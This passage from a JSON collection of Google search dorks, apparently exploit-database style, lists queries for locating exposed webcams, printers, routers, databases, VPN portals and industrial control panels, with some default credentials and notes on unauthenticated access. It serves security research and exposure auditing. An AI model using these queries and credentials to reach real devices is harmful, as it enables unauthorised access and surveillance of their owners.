login portals.\r\n# Date: 18/01/2019.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Login Portals"}, {"dork": "intitle:QueryService Web Service", "description": "# Google Dork: intitle:QueryService Web Service\r\n# Description: QueryService Web Service exposed to internet\r\n# Date: 2019-01-27\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "intitle:\"Device(\" AND intext:\"Network Camera\" AND \"language:\" AND \"Password\"", "description": "Dork about ReeCam IP Camera\r\n\r\nintitle:\"Device(\" AND intext:\"Network Camera\" AND \"language:\" AND \"Password\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intext:\"Any time & Any where\" AND \"Customer Login\"", "description": "Dork about Avtech - Video Surveillance Technology\r\nSeveral login panels\r\n\r\nintext:\"Any time & Any where\" AND \"Customer Login\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"Screenly OSE\" intext:\"Schedule Overview\" AND \"Active Assets\" AND \"Inactive Assets\"", "description": "Dork about Screenly OSE\r\nIs the most popular open source digital signage software for the Raspberry Pi\r\n\r\nintitle:\"Screenly OSE\" intext:\"Schedule Overview\" AND \"Active Assets\" AND \"Inactive Assets\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "inurl:\"fhem.cfg\" AND 'fhem.cfg' -github", "description": "Dork about FHEM - Perl server for house automation (configuration files)\r\n\r\ninurl:\"fhem.cfg\" AND 'fhem.cfg' -github\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"webcam 7\" inurl:'/gallery.html'", "description": "Dork about webcams and ip cameras server for windows\r\n\r\n\r\nintitle:\"webcam 7\" inurl:'/gallery.html'\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"Login - Xfinity\" AND \"Gateway > Login\"", "description": "Dork about login panels of Xfinity Routers\r\n\r\n\r\nintitle:\"Login - Xfinity\" AND \"Gateway > Login\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"Home-CUPS\" intext:printers -mugs", "description": "CUPS printer deamons\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/snap.cgi?&-getpic", "description": "Exposes a number of Master IP CAM 01 IP camera's\r\n\r\nMidori'SH\r\nhttps://twitter.com/MidoriShell"}, {"dork": "allinurl:asdm.jnlp", "description": "Find Cisco ASDM Appliance:\r\n\r\n\r\nallinurl:asdm.jnlp\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intitle:\"NetcamSC IP Address\"", "description": "Reveals ip address\r\n\r\nRegards\r\nHussain Vohra"}, {"dork": "\"/1000/system_information.asp\"", "description": "Find Pioneer router control panels. no login needed.\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:8000/portal/", "description": "inurl:8000/portal/"}, {"dork": "inurl:/portal/apis/fileExplorer/", "description": "inurl:/portal/apis/fileExplorer/"}, {"dork": "intitle:'Welcome to JBoss AS'", "description": "*Search: * JBoss Administrator Console\r\n*Google Dorks:*intitle:'Welcome to JBoss AS'\r\n*Default Credentials:* admin:admin\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "\"Powered by Trac 1.0.2\"", "description": "Find Reporting-based websites that are using Trac.\r\n\r\n~ CrimsonTorso"}, {"dork": "Find 3cx Phone System Management Console", "description": "Find 3cx Phone System Management Console\r\n\r\n\r\nallintitle:\"3cx phone system management console\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "site:azurewebsites.net inurl:.gov | .mil | .edu", "description": "*Google Dork:* site:azurewebsites.net inurl:.gov | .mil | .edu\r\n\r\n*Description: *Here is a Google Dork that reveals a large footprint of all\r\n.gov, .edu, and, .mil websites that are hosted and setup on Microsofts\r\nAzure cloud platform.\r\n\r\n*By:* edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "\"This service is powered by a copy of ZendTo\"", "description": "Find websites using ZendTo software, which includes File Upload & Login\r\nportals.\r\n~ CrimsonTorso"}, {"dork": "inurl:/signin.php?ret=", "description": "This dork will return websites which are running ShoreTel Connect\r\nconferencing portals.\r\n\r\nRamikan"}, {"dork": "\"Powered by ViewVC 1.0.3\"", "description": "Find open file access and databases through ViewVC.\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:/pages/default.aspx | inurl:/p\u00e1ginas/default.aspx", "description": "# Google Dork: inurl:/pages/default.aspx | inurl:/p\u00e1ginas/default.aspx\r\n# Description: Google Dork to find default sharepoint applications\r\n# Date: 2019-09-12\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:TOP/PRTINFO.HTML", "description": "inurl:TOP/PRTINFO.HTML\r\n \r\nFound Epson printer without password administrator.\r\n \r\nMy name : EJUPI B\u00e9kim"}, {"dork": "inurl:/clusters intitle:\"kafka Manager\"", "description": "Manage/Monitor sensitive information in Kafka.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "intext:\"series Network Configuration\" AND intext:\"canon\"", "description": "intext:\"series Network Configuration\" AND intext:\"canon\"\r\n \r\nFound CANON device\r\n \r\nAuthor : EJUPI B\u00e9kim"}, {"dork": "inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true", "description": "# Google Dork: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true\r\n# Description: Google Dork to find JBoss Management Console Server Information or tomcat status\r\n# Date: 2019-05-15\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/", "description": "# Google Dork: inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/\r\n# Description: Google Dork to find ColdFusion management interfaces exposed online\r\n# Date: 2019-05-15\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "intitle:\"LaserJet\" \"Device status\" \"Supplies summary\"", "description": "This Dork finds HP MFP devices that have their management interface exposed to the Internet.\r\n\r\n\r\n# Exploit Title: HP MFP Devices\r\n# Google Dork: intitle:\"LaserJet\" \"Device status\" \"Supplies summary\"\r\n# Date: May 22, 2019\r\n# Exploit Author: Robert Marmorstein\r\n# Vendor Homepage: https://www8.hp.com/us/en/home.html"}, {"dork": "intitle:\"Pi-hole Admin Console\"", "description": "Description: Find Pi-Hole Admin Consoles\r\n\r\nAuthor: Fabio Stoll (Fastor)"}, {"dork": "intext:\" Welcome to DSL-2730B Web Management\"", "description": "Google Dork: intext:\" Welcome to DSL-2730B Web Management\"\r\n\r\nDlink DSL-2730B Web Management"}, {"dork": "inurl:/_cat/indices/", "description": "Dork connected to latest Orvibo database leak.\r\n\r\nRegards\r\nbaxter21"}, {"dork": "inurl:8443 AND -intitle:8443 AND -intext:8443 prohibited|restricted|unauthorized", "description": "Interesting content/portals hosted on non-standard ports.\r\n\r\ninurl:8443 AND -intitle:8443 AND -intext:8443\r\nprohibited|restricted|unauthorized\r\n\r\nAlternatively this can be replaced with\r\n\r\ninurl:8080 AND -intitle:8080 AND -intext:8080\r\nprohibited|restricted|unauthorized\r\n\r\nD"}, {"dork": "inurl:app/kibana intext:Loading Kibana", "description": "# Exploit Title: Kibana Login no credentials\r\n\r\n# Google Dork: inurl:app/kibana intext:Loading Kibana\r\n\r\n#Author: Francis Al Victoriano"}, {"dork": "inurl:ftp://ftp", "description": "Detecting ftp sites:\r\n\r\ninurl:ftp://ftp\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:ftp://ftp robots.txt", "description": "finding robots.txt in ftp sites:\r\n\r\ninurl:ftp://ftp robots.txt\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:Grafana - Home inurl:/orgid", "description": "Finding Grafana Dashboards\r\n\r\n# Google Dork: intitle:Grafana - Home inurl:/orgid\r\n# Date: [16-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:apache couchdb - futon: overview inurl:/_utils", "description": "Couchdb Web Panel\r\n\r\n# Google Dorks: \r\nintitle:apache couchdb - futon: overview inurl:/_utils\r\nintitle:apache couchdb - futon: browse database inurl:/_utils\r\n\r\n# Date: [17-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:member.*.*/auth/login", "description": "Login Pages:\r\n\r\nsite:member.*.*/auth/login\r\nsite:members.*.*/auth/login\r\nsite:portal.*.*/auth/login\r\nsite:user.*.*/auth/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"VideoEdge Admin Interface\"", "description": "Various online devices\r\n\r\n- Steve George"}, {"dork": "inurl:webArch/mainFrame filetype:cgi intext:\"Web Image Monitor\"", "description": "Dork: inurl:webArch/mainFrame filetype:cgi intext:\"Web Image Monitor\"\r\n\r\nAuthor: M. Cory Billington\r\n\r\nInfo: Web portals for Ricoh printers/copiers/multifunction machines"}, {"dork": "inurl:\"/hp_login.html\"", "description": "Google Dork Submission for finding publicly facing HP Devices, usually internal switches. Leads to a login screen.\r\n\r\nAuthor: MiningOmerta"}, {"dork": "intitle:\"openshift web console\" inurl:console inurl:/console", "description": "Openshift Web Console\r\n\r\n# Google Dork: intitle:\"openshift web console\" inurl:console inurl:/console\r\n# Date: [12-09-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intext:{{szErrorTip}} inurl:/doc/page/login.asp", "description": "Discover Hikvision IP cameras facing the internet"}, {"dork": "intitle:\"Marshall VS Server\"", "description": "Online Devices:\r\n\r\nintitle:\"Marshall VS Server\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:CGI/Java/Serviceability?adapter=device.statistics.device", "description": "# Google Dork: inurl:CGI/Java/Serviceability?adapter=device.statistics.device\r\n# Description: Google Dork to find Cisco Unified IP Phones\r\n# Date: 2019-11-21\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:\"/index.php?enter=guest\"", "description": "Zabbix login portal:\r\n\r\ninurl:\"/index.php?enter=guest\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"8080/dashboard/\" intitle:\"Dashboard\"", "description": "Zabbix Login Portal:\r\n\r\ninurl:\"8080/dashboard/\" intitle:\"Dashboard\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Home - Mongo Express\"", "description": "Google dork description: Mongo Express instances. Most have no\r\nauthentication enabled\r\n\r\nGoogle Search: intitle:\"Home - Mongo Express\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "intitle:\"WSO2 Management Console\"", "description": "Google dork description: Instances of WSO2 Carbon, an opensource middleware\r\nplatform.\r\n\r\nGoogle Search: intitle:\"WSO2 Management Console\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf"}, {"dork": "intitle:rsview32 ext:asp", "description": "This dork lists all the OT systems running Rockwell Automation web servers.\r\n\r\nRegards,\r\nSrini"}, {"dork": "\"Firmware Version\" intitle:\"iLO\" ProLiant Login -hpe.com -update", "description": "Dork for device (iLo ProLiant HPE) discovery.\r\nThis is an alternative to shodan\r\n\r\n Bruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Security is Off\" intitle:\"Namenode information\"", "description": "Description:\r\nUnprotected public Hadoop Administration dashboards\r\n\r\nDork :\r\nintext:\"Security is Off\" intitle:\"Namenode information\"\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:/swagger/index.html", "description": "# Exploit Title: Publicly Exposed Swagger API Documentation\r\n# Google Dork: inurl:/swagger/index.html\r\n# Date: 02/19/2020\r\n# Exploit Author: MuckT"}, {"dork": "site:*/cgi-bin/webproc intext:\"username\"", "description": "Online devices:\r\n\r\nsite:*/cgi-bin/webproc intext:\"username\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"nobody/loginQuick.htm\"", "description": "Avtech CCTV Login Page :\r\n\r\ninurl:\"nobody/loginQuick.htm\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "intitle:\"IP CAMERA Viewer\" intext:\"setting | Client setting\"", "description": "####################Intro#####################\r\nThis dork shows TP-LINK, Zavio and Intellinet cameras stream.\r\n\r\n################Default Creds##################\r\nZavio and TP-LINK | admin:admin\r\nIntellinet | admin:1234\r\n\r\n###############About me######################\r\nDiscovered by Roni Carta alias Lupin\r\nTwitter : https://twitter.com/0xLupin"}, {"dork": "\"VB Viewer\" inurl:/viewer/live/ja/live.html", "description": "Dork:\r\n\"VB Viewer\" inurl:/viewer/live/ja/live.html\r\n\r\nDescription:\r\nIP Cameras"}, {"dork": "inurl:\"MultiCameraFrame?Mode=Motion\"", "description": "# Google Dork: inurl:\"MultiCameraFrame?Mode=Motion\"\r\n\r\n# By using this dork, various web cameras can be revealed.\r\n\r\n# Date: 12/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"view/index.shtml\"", "description": "# Google Dork: inurl:\"view/index.shtml\"\r\n\r\n# By using this dork, various camera LIVE AXIS MODEL web interfaces can be\r\nfound.\r\n\r\n# Date: 14/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:psp intitle:\"Motorola - FX9500\"", "description": "Exploit Title: RFID reader information unauthenticated\r\nGoogle dork:filetype:psp intitle:\"Motorola - FX9500\"\r\nDate:3/17/2020\r\nExploit author: techjohnny"}, {"dork": "intitle:ThingsBoard inurl:8080/dashboard", "description": "# Google Dork: intitle:ThingsBoard inurl:8080/dashboard\r\n\r\n# By using this dork, various ThingsBoard dashboards (humidity,\r\ntemperature, etc) can be found.\r\n\r\n# Date: 26/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"EWS Data Collection and Use\"", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:hp/device/deviceinformation", "description": "Category: Various Online Devices\r\n\r\ninurl:hp/device/deviceinformation\r\ninurl:hp/device/firmwareupgrade\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:cgistart", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "intitle:NetworkCamera intext:\"Pan / Tilt\" inurl:ViewerFrame", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:axis-cgi/mjpg/video.cgi", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:view.shtml", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/live.htm intext:\"M-JPEG\"|\"System Log\"|\"Camera-1\"|\"View Control\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/HDDReplay.html", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:8000 intext:\"Copyright CANON INC. 2012\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "intitle:\"webcamXP 5\" inurl:8080 'Live'", "description": "Description: \r\n\r\nintitle:\"webcamXP 5\" inurl:8080 'Live'\r\nintitle:\"webcamXP 5\" inurl:'/gallery.html' -download\r\n\r\nThis google dork gives us the live webcamXP camera footages of various\r\nwebservers."}, {"dork": "intitle:(\"Solr Admin\") AND intext:(\"Dashboard\" AND \"Corporation\")", "description": "# Dork #\r\n\r\nintitle:(\"Solr Admin\") AND intext:(\"Dashboard\" AND \"Corporation\")\r\n\r\n\r\nThis dork possibly allow to view Solr Admin Dashboard."}, {"dork": "intitle:(\"Solr admin page\") AND intext:(\"Make a Query\")", "description": "# Dork #\r\n\r\nintitle:(\"Solr admin page\") AND intext:(\"Make a Query\")"}, {"dork": "intitle:\"Printer Status\" AND inurl:\"/PrinterStatus.html\"", "description": "# Dork #\r\n\r\nintitle:\"Printer Status\" AND inurl:\"/PrinterStatus.html\"\r\n\r\nVarious Online Devices- for Lexmark/Dell Printer."}, {"dork": "inurl:\"/English/pages_WinUS/\" AND intitle:\"Top page\"", "description": "# Dork #\r\n\r\ninurl:\"/English/pages_WinUS/\" AND intitle:\"Top page\"\r\n\r\nVarious Online Devices- for Canon Printer."}, {"dork": "inurl:/dana-cached/sc/", "description": "# Exploit Title: Pulse Secure SSL VPN\r\n\r\n# Google Dork: inurl:/dana-cached/sc\r\n\r\n# Author: Kitchaphan Singchai (idealphase)"}, {"dork": "inurl:/dana/home/ filetype:cgi", "description": "# Exploit Title: Pulse Secure SSL VPN\r\n\r\n# Google Dork: inurl:/dana/home/ filetype:cgi\r\n\r\n# Author: Kitchaphan Singchai (idealphase)"}, {"dork": "intitle:\"index of\" \"cvsweb.cgi\"", "description": "Description: intitle:\"index of\" \"cvsweb.cgi\"\r\nThis google dork contains cvsweb configuration information related to\r\ncommand gateway interface of different websites. Using this dork we can\r\nfind juicy information of different config files and repositories."}, {"dork": "inurl:./sws/index.sws", "description": "inurl:./sws/index.sws\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about Samsung Printer."}, {"dork": "inurl:SSI/index.htm", "description": "inurl:SSI/index.htm\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about HP LaserJet Professional Printer."}, {"dork": "inurl:/frameprop.htm", "description": "inurl:/frameprop.htm\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about Xerox Phaser Printer."}, {"dork": "inurl:sws/index.html AND intext:\"Model Name\" AND intext:\"Serial Number\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/main.html intext:SHARP AND intext:MX-*", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:mainFrame.cgi intext:\"RICOH\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/index.htm intext:\"Oki Data Corporation\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:8080/dashboard intitle:Graphite Dashboard", "description": "# Google Dork: inurl:8080/dashboard intitle:Graphite Dashboard\r\n\r\n# Various Graphite Dashboards.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:8080/dashboard.php", "description": "# Google Dork: inurl:8080/dashboard.php\r\n\r\n# Zabbix Dashboards.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Kyocera Command Center\" inurl:index.htm", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "intitle:\"Internet Services\" inurl:default.htm intext:\"FUJI XEROX\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "intitle:\"WeatherLinkIP Configuration\"", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:/db.php?path_local=", "description": "Dork: inurl:/db.php?path_local=\r\nDescription: This Google dork lists out local test db paths for a\r\nweb-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/gmap.php?id=", "description": "Dork: inurl:/gmap.php?id=\r\nDescription: This Google dork lists out gmap config details for a drupal\r\nweb-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "site:*/EWS/Exchange.asmx", "description": "Author: MiningOmerta\r\n\r\nFinds indexed Microsoft Exchange Servers (Includes Office 365) for e-mail synchronization.\r\n\r\nsite:*/EWS/Exchange.asmx\r\n\r\nlink:\r\n\r\nhttps://www.google.com/search?q=site%3A*%2FEWS%2FExchange.asmx\r\n\r\nor\r\n\r\nhttps://www.google.com/search?q=site%3A*%2FEWS%2FExchange.asmx+-contoso\r\n\r\nif you don\u2019t want the \u201cHello World\u201d of Microsoft Domains :)"}, {"dork": "intitle:\"WEBCAM 7 \" -inurl:/admin.html", "description": "Google Dork : \r\nintitle:\"WEBCAM 7 \" -inurl:/admin.html\r\nintitle:\"WEBCAM 7 \" -site:.com\r\n\r\n\r\nNisankh Acharjya"}, {"dork": "intitle:\"HP ALM\" \"Application Lifecycle Management\" inurl:/qcbin/ -ext:PDF", "description": "# Google Dork: intitle:\"HP ALM\" \"Application Lifecycle Management\"\r\ninurl:/qcbin/ -ext:PDF\r\n\r\n# Description: Find Hewlett Packard - Application Lifecycle Management.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "allinurl:top.htm?Currenttime", "description": "# Google Dork: allinurl:top.htm?Currenttime\r\n# Just a few internet D-Link Cameras.\r\n# Date: 2020-05-29\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:index.shtml", "description": "Dork: inurl:index.shtml\r\n\r\nDescription: This google dork lists out the various camera LIVE AXIS MODEL\r\naround the world.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:/sws/index.html", "description": "Dorks: inurl:/sws/index.html\r\nCategory: Sensitive Information\r\nSummary: A Google dork that gives information about Samsung Printer."}, {"dork": "inurl:/base/main_login.html intext:\"Login\"", "description": "Dorks: inurl:/base/main_login.html intext:\"Login\"\r\nCategory: Sensitive Information\r\nSummary: A Google dork that gives information about the NETGEAR Router."}, {"dork": "inurl:/jobq.htm AND intext:\"ApeosPort-V\"", "description": "Dorks: inurl:/jobq.htm AND intext:\"ApeosPort-V\"\r\nCategory: Sensitive Information\r\nSummary: A Google dork that gives information about Xerox Printer."}, {"dork": "inurl /view.shtml intext:\"Airport\"", "description": "inurl /view.shtml intext:\"Airport\""}, {"dork": "intitle:\"SFXAdmin - sfx_global\" intext:\"Login Form\"", "description": "# Google Dork: intitle:\"SFXAdmin - sfx_global\" intext:\"Login Form\"\r\n# Various pages containing login portals.\r\n# Date: 3/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ViewerFrame? intitle:\"Network Camera NetworkCamera\"", "description": "# Google Dork: inurl:/ViewerFrame? intitle:\u201dNetwork Camera NetworkCamera\u201d\r\n# Various online devices.\r\n# Date: 20/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/general/status.html\"", "description": "Dorks: inurl:/frameprop.htm\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about the Brother Printers Printer.\r\n\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "inurl:axis-cgi/jpg", "description": "Description: inurl:axis-cgi/jpg\r\n\r\nThis google dorks give us various screenshot of secured webcam.\r\n\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "intext:\"Frame rate\" inurl:/home/homej.html", "description": "# Google Dork: intext:\"Frame rate\" inurl:/home/homej.html\r\n# Various online devices.\r\n# Date: 24/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Device Name\" | intext:\"Host Name\" inurl:mainFrame.cgi", "description": "# Google Dork: intext:\"Device Name\" | intext:\"Host Name\" inurl:mainFrame.cgi\r\n# Various online devices.\r\n# Date: 24/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:axis-cgi/mjpg/video swf", "description": "inurl:axis-cgi/mjpg/video swf\r\n\r\nThis google dorks give us various videos & clips of secured webcam.\r\nlinkedin profile: https://www.linkedin.com/in/sachin-k-92b521151/\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:/home/homej.html", "description": "# Google Dork: inurl:/home/homej.html\r\n# Various online devices.\r\n# Date: 22/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:8081/ \"Pan, Tilt & Zoom\"", "description": "# Google Dork: inurl:8081/ \"Pan, Tilt & Zoom\"\r\n\r\n# Various online devices (webcams).\r\n\r\n# Date: 29/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"HP LaserJet\" inurl:\"SSI/index.htm\"", "description": "# Google Dork: \"HP LaserJet\" inurl:\"SSI/index.htm\"\r\n\r\n# Various online devices (HP LaserJet Printers).\r\n\r\n# Date: 29/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"webcam\" inurl:login", "description": "My name is Aditya Rana and I would like to report this new google dork.\r\nDescription- intitle:\"webcam\" inurl:login\r\nThis dork gives various online devices login page.\r\n\r\nProof of concept"}, {"dork": "\"Camera Live Image\" inurl:\"guestimage.html\"", "description": "# Google Dork: \"Camera Live Image\" inurl:\"guestimage.html\"\r\n# Various online devices (webcams).\r\n# Date: 07/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"UPS Status\" \"Status\" inurl:/host", "description": "# Google Dork: intitle:\"UPS Status\" \"Status\" inurl:/host\r\n# Various online devices (UPS Devices).\r\n# Date: 06/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:.*eservices/login", "description": "#Dork:inurl:.*eservices/login\r\n#Description: lists eservices logins of govt/org\r\n#Author: Jitendra Kumar Tripathi\r\n\r\nSent with ProtonMail Secure Email."}, {"dork": "intitle:\"Tuxedo Connected Controller\"", "description": "# Google Dork: intitle:\"Tuxedo Connected Controller\"\r\n# Web based home automation control pages.\r\n# Date: 20/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/config/cam_portal.cgi \"Panasonic\"", "description": "# Google Dork: inurl:/config/cam_portal.cgi \"Panasonic\"\r\n# Panasonic Network Camera Management System\r\n# Date: 20/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"view.shtml\" \"Network Camera\"", "description": "# Google Dork: inurl:\"view.shtml\" \"Network Camera\"\r\n# Various online devices (webcams).\r\n# Date: 21/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"Welcome to the Web-Based Configurator\"", "description": "Google Dork: allintitle:\"Welcome to the Web-Based Configurator\"\r\n\r\nDescription: This Google Dork is useful in detecting login pages/portals of\r\nZyXEL based networking devices, mainly router configuration interfaces.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "inurl:/presentation/html/top/index.html", "description": "# Google Dork: inurl:/presentation/html/top/index.html\r\n# Description: discover publicly available Epson devices (printer, scanner etc.)\r\n# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)"}, {"dork": "intitle:\"Miniweb Start Page\"", "description": "# Google Dork: intitle:\"Miniweb Start Page\"\r\n# Siemens SIMATIC HMI panels.\r\n# Date: 27/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:8080/view/viewer_index.shtml?id= -site:*.com", "description": "# Dork: inurl:8080/view/viewer_index.shtml?id= -site:*.com\r\n# Author: Mehmet Ali Kerimoglu"}, {"dork": "intitle:\"Rockwell Automation\" inurl:\"index.html\" \"Device Name\"", "description": "# Google Dork: intitle:\"Rockwell Automation\" inurl:\"index.html\" \"DeviceName\"\r\n# Rockwell Automation PLC dashboards.\r\n# Date: 26/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/viewer/live/index.html\"", "description": "# Explanation: Webcams, mostly controllable without authentication.\r\n# Google Dork: inurl:\"/viewer/live/index.html\"\r\n# Date: 17SEP2020\r\n# Exploit Author: Frank Rizzuto"}, {"dork": "inurl:/CgiStart?page", "description": "# Google Dork: inurl:/CgiStart?page\r\n# Various online devices (webcams).\r\n# Date: 18/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/viewer/live.html\"", "description": "#Exploit Title : Webcams, various online devices.\r\n#Google Dork: inurl:\"/viewer/live.html\"\r\n#Date : 18/09/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n*Sanu Jose M*"}, {"dork": "inurl:\"live/cam.html\"", "description": "#Exploit Title : Webcams, various online devices.\r\n#Google Dork: inurl:\"live/cam.html\"\r\n#Date : 23/09/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "\"Pop-up\" + \"Live Image\" inurl:index.html", "description": "# Google Dork: \"Pop-up\" + \"Live Image\" inurl:index.html\r\n# Various online devices (webcams).\r\n# Date: 28/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"webArch/mainFrame.cgi\" + \"Web Image Monitor\"", "description": "# Google Dork: inurl:\"webArch/mainFrame.cgi\" + \"Web Image Monitor\"\r\n# Web portals for Ricoh printers.\r\n# Date: 26/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/8080 \"windows\" \"live view\"", "description": "#Exploit Title :Webcams, various online devices.\r\n#Google Dork: inurl:/8080 \"windows\" \"live view\"\r\n#Date : 30/09/2020\r\n#Exploit Author : Raghotham Mruthike\r\n\r\nWarm regards\r\nRaghotham Mruthike"}, {"dork": "inurl:set_config_password.html", "description": "# inurl:set_config_password.html\r\n\r\n# HP Printer login portals, where authentication is not set. Attackers can\r\nvisit the links from the dork output to set Administrator Password.\r\n\r\n# Date: 17/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NetCamSC*\" | intitle:\"NetCamXL*\" inurl:index.html", "description": "# Google Dork: intitle:\"NetCamSC*\" | 